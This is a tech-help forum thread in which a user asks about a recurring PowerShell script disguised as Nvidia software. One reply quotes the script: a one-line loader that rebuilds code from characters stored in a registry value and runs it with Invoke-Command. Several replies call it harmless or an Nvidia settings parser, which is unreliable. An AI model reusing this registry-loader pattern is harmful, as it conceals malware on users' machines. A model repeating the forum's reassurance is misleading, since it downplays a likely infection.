Can anyone analyze this script...

Halbour

Halbour

Love yourself
OP
Member
Level 7
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,097
Country
Israel
It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.
 

Attachments

  • 15EEF3A6-E215-43A2-8C70-9ADAF0719062.txt
    205 bytes · Views: 106
Halbour

Halbour

Love yourself
OP
Member
Level 7
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,097
Country
Israel
IDK, it just shows 4 PS Windows that dissappear after a few seconds... and take RAM in the Task Manager. Nothing else. But... it's really annoying, to know that the control on my PC isn't mine... and when it decides to show up in the middle of a game- I'm straight up screwed... annoyingly jumps in the middle of my Spider-swings..
Post automatically merged:

M4x1mumReZ said:
You should be fine, there seems to be nothing too malicious about it. Don't know what it does though I'm afraid.
Click to expand...
Thank you for answering, though...!
 
  • Like
Reactions: SylverReZ
sombrerosonic

sombrerosonic

Idiot machine
Member
Level 12
Joined
Jan 12, 2022
Messages
1,453
Trophies
2
Location
The Tower of pizza
XP
2,892
Country
United States
Halbour said:
It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.
Click to expand...
Try to delete it, then deep scanning your PC. the PS1 script seems to not be malicious, however better safe than sorry
 
  • Like
Reactions: SylverReZ and Halbour
JaapDaniels

JaapDaniels

Well-Known Member
Member
Level 11
Joined
Apr 22, 2012
Messages
1,191
Trophies
1
Age
40
Website
github.com
XP
2,427
Country
Netherlands
It doesn't seem to be anything wrong... it looks to be a graphics settings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.
 
  • Like
Reactions: SylverReZ and Halbour
Halbour

Halbour

Love yourself
OP
Member
Level 7
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,097
Country
Israel
JaapDaniels said:
It doesn't seem to be anything wrong... it looks to be a graphics ettings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.
Click to expand...
And in English..?
 
JaapDaniels

JaapDaniels

Well-Known Member
Member
Level 11
Joined
Apr 22, 2012
Messages
1,191
Trophies
1
Age
40
Website
github.com
XP
2,427
Country
Netherlands
Halbour said:
And in English..?
Click to expand...
$variable1=[ScriptBlock]
$variable2=[string]
$variable3=[char]
icm ($variable1::Create($variable2::Join('', ((gp 'HKLM:\SOFTWARE\NVIDIA CorporationNVf6Cb').'VDzb5hT6' | % { [char]$_ })))).
HKLM:\SOFTWARE\NVIDIA Corporation = registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation.
i'm not 100% sure what the variables do from icm till gp, but it looks to be legit for a 3D emulator to write to the GPU interpretate $variable1 fixed location or so within the PS1 as overall beïng Scriptblock (naming it this way may help to keep the code easy to read... the same goes for string and char.
 
  • Like
Reactions: Halbour and Vine-gar
JaapDaniels

JaapDaniels

Well-Known Member
Member
Level 11
Joined
Apr 22, 2012
Messages
1,191
Trophies
1
Age
40
Website
github.com
XP
2,427
Country
Netherlands
Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mine shit coins for someone else.
 
Last edited by JaapDaniels,
  • Like
  • Haha
Reactions: Halbour and SylverReZ
Halbour

Halbour

Love yourself
OP
Member
Level 7
Joined
Jan 8, 2021
Messages
250
Trophies
1
XP
1,097
Country
Israel
JaapDaniels said:
Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mai shit coins for someone else.
Click to expand...
The thing is, I never got this script from someone...
 
JaapDaniels

JaapDaniels

Well-Known Member
Member
Level 11
Joined
Apr 22, 2012
Messages
1,191
Trophies
1
Age
40
Website
github.com
XP
2,427
Country
Netherlands
I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.
 
  • Like
Reactions: Halbour, SylverReZ and sombrerosonic
SylverReZ

SylverReZ

Dat one with the Rez
Member
GBAtemp Patron
Level 29
Joined
Sep 13, 2022
Messages
7,111
Trophies
3
Location
The Wired
Website
m4x1mumrez87.neocities.org
XP
21,802
Country
United Kingdom
JaapDaniels said:
I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.
Click to expand...
I'm still using the good ol' Command Prompt and Terminal for everything.
 
  • Like
Reactions: Halbour and sombrerosonic

Site & Scene News

Go to forum More news

Popular threads in this forum

"New Windows driver blocks software from changing default web browser"

Does anyone still use Windows 7 as their daily OS?

Windows users should try to be more open minded to try Linux

Windows 11 might not update if you have these popular apps installed

Flickering Video on emulator

Was there ever going to be new generations of SATA after SATA III?

can't host parsec

Use Win10 system as Bluetooth Speaker without user input?

General chit-chat
Help Users
    AncientBoi @ AncientBoi: 🥓 🍳 🍞 🍽️ 🥛